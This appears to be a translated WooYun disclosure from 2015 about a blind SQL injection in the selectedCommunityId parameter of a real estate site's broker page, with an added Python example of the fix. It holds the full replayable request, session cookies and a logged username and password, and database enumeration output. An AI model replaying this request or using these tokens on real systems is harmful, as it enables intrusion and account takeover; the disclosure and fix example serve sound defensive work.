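Vulnerability summary

Bug ID: wooyun-2015-0148249

Vulnerability title: Severe SQL injection on an important Anjuke site

Affected vendor: Anjuke (安居客)

Reported by: 沦沦

Submitted: 2015-10-21 09:12

Fixed: 2015-12-05 10:20

Disclosed: 2015-12-05 10:20

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]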


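Vulnerability details

Disclosure status:

2015-10-21: Details reported to the vendor; awaiting vendor action
2015-10-21: Confirmed by the vendor; details disclosed to the vendor only
2015-10-31: Details disclosed to core white hats and experts in related fields
2015-11-10: Details disclosed to regular white hats
2015-11-20: Details disclosed to trainee white hats
2015-12-05: Details disclosed to the public

Brief description:

As the title says.

Detailed description: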

GET /user/broker/ppc/marketanalysis/?selectedCommunityId=2440* HTTP/1.1
Host: my.anjuke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.anjuke.com/user/broker/ppc/marketanalysis/?selectedCommunityId=2440
Cookie: td_cookie=414946580; aQQ_ajkguid=583D1A30-E7E6-6F90-C974-53BD80CDB19D; ctid=11; _ga=GA1.2.620016332.1445315740; Hm_lvt_c5899c8768ebee272710c9c5f365a6d8=1445315740,1445386343; __xsptplus8=8.2.1445386342.1445387388.2%233%7Cwww.wooyun.org%7C%7C%7C%7C%23%235Ra0azV6RqTKvJaOfo4bFconiglk4Sr5%23; lui=16143%3A2; history=%2Fapi%2Flogin%2Fsubmit%3Fusername%3Dzhangchao%26password%3D123456%26remember%3Dtrue%26callback%3Dwindow.user.callbackDetail; UserType=2; me=1; aQQ_modbbsadminauthinfos=v6opwQ9T7PHak4UGWTEZht0Ztl0iI0L%2FmFp3djulhG%2FNqxNSiZwt; aQQ_Memberauthinfos=4q8pkghW6aXak4UGWTEZht0Ztl0iI0L%2FlEZWc3yolk%2B%2Bkx5RiJ4tT7jICXc; aQQ_hzweb_uid=16143; aQQ_haozuusername=%E5%BC%A0%E8%B6%85%7Cbroker%7Chttp%3A%2F%2Fmy.anjuke.com%2Fmy%2Fhome%2F%7Chttp%3A%2F%2Fagent.anjuke.com%2Fmy%2Flogout%2F; aQQ_sid=Hilesc; sessid=CEA39F62-7870-327F-89ED-7CB10CB02C50; lps=http%3A%2F%2Fuser.anjuke.com%2Fmy%2Flogin%3Fhistory%3DaHR0cDovL2d1YW5nemhvdS5hbmp1a2UuY29tLw%3D%3D%7C; twe=2; ajk_member_captcha=540d7396be3856b18612ad89ad6835c1; Hm_lpvt_c5899c8768ebee272710c9c5f365a6d8=1445386343; aQQ_ajkauthinfos=v%2F56kQgBvPLak4UGWTE7h4s3gkRDJ0CelF57dSOr6XrBqxltjaUsS7z0M33vQ4cZSpEe6%2Fo9XiAMRay8ZQiDY8F9; usertype=2; ajk_member_id=16143; ajk_member_name=zhangchao; ajk_member_from=16143; ajk_member_key=16143; ajk_member_time=16143; aQQ_Brokerauthinfos=5f96xw9fuf%2FakoECXQ9S541E5w57dBvPyAwnGHyo11uB7koitJ0pS731MXDpTo8gcakZ6MA5YyUIf6G5bgmz; jp_member_id=123450; jp_auth_info=cf1485160f27c59a429e389b2df28a89; jp_auth_info_new=5qhxlAdTu6CQh9FKGlERi%2BMDuFMvYBfHyAgjInD5mAuD3w; NewGuide=5388%405%3AId%26301521%2CBI%265388%2CGT%265%2CGS%261; wendaexam_5388=144%2C0%2C0%2C0%7C146%2C0%2C0%2C0%7C147%2C0%2C0%2C0%7C149%2C0%2C0%2C0%7C150%2C0%2C0%2C0%7C155%2C0%2C0%2C0%7C157%2C0%2C0%2C0%7C161%2C0%2C0%2C0%7C162%2C0%2C0%2C0%7C164%2C0%2C0%2C0; wendaexamstart_5388=1445386456; PHPSESSID=kk6g4n1vtv30s2o1mtfacoacs4; als=0
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
If-Modified-Since: Wed,21 Oct 2015 08:30:09 GMT


The selectedCommunityId parameter is vulnerable to blind SQL injection.


available databases [11]:
[*] aag_dw_stats
[*] ajk_dw_stats
[*] heartbeat_db
[*] hz_dw_stats
[*] if_dw_stats
[*] informatihn_schema
[*] jp_dw_stats
[*] mysql
[*] pepcona
[*] performance_schema
[*] test

Proof of vulnerability:


Suggested fix:

Filter the input.
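What filtering means for a numeric parameter such as selectedCommunityId, shown as an added example that is not code from the report or from the vendor: the concatenated query answers a true and a false condition differently, which is the signal blind injection relies on, while allow-list validation plus a bound parameter removes that difference. SQLite stands in for the MySQL backend, and the table, rows and function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE community (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO community VALUES (?, ?)",
                   [(2440, "sample-a"), (2441, "sample-b")])
    return db

def lookup_concatenated(db, selected_community_id):
    """Vulnerable pattern: the raw parameter becomes part of the SQL text."""
    sql = "SELECT name FROM community WHERE id = " + selected_community_id
    return db.execute(sql).fetchall()

def parse_community_id(raw):
    """Allow-list validation: ASCII digits only, bounded length."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError("selectedCommunityId must be a positive integer")
    return int(raw)

def lookup_bound(db, selected_community_id):
    """Hardened pattern: validate first, then bind the value as a parameter."""
    cid = parse_community_id(selected_community_id)
    return db.execute("SELECT name FROM community WHERE id = ?",
                      (cid,)).fetchall()

def demo():
    db = make_db()
    results = {
        # Same id, different appended condition: the row count changes,
        # so the response leaks one bit per request.
        "concat_true": lookup_concatenated(db, "2440 AND 1=1"),
        "concat_false": lookup_concatenated(db, "2440 AND 1=2"),
        "bound_ok": lookup_bound(db, "2440"),
    }
    try:
        lookup_bound(db, "2440 AND 1=2")
        results["bound_rejected"] = False
    except ValueError:
        # The hardened path never builds SQL from the raw string.
        results["bound_rejected"] = True
    return results

if __name__ == "__main__":
    print(demo())
```

Validation and binding are both kept: binding alone already stops the parameter from being parsed as SQL, and the integer check rejects malformed input before it reaches the database.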

Copyright notice: when reposting, please credit the source 沦沦@乌云 (WooYun)


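Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 17

Confirmed: 2015-10-21 10:19

Vendor reply:

Thank you for your support of Anjuke!

Latest status:

None yet

Vulnerability comments:

Comments

  1. 2015-10-21 09:32 | 泳少 ( Regular white hat | Rank: 232, vulnerabilities: 80 | ★ Having set out on the road of dreams, even on my knees I will...)

    Impressive, master.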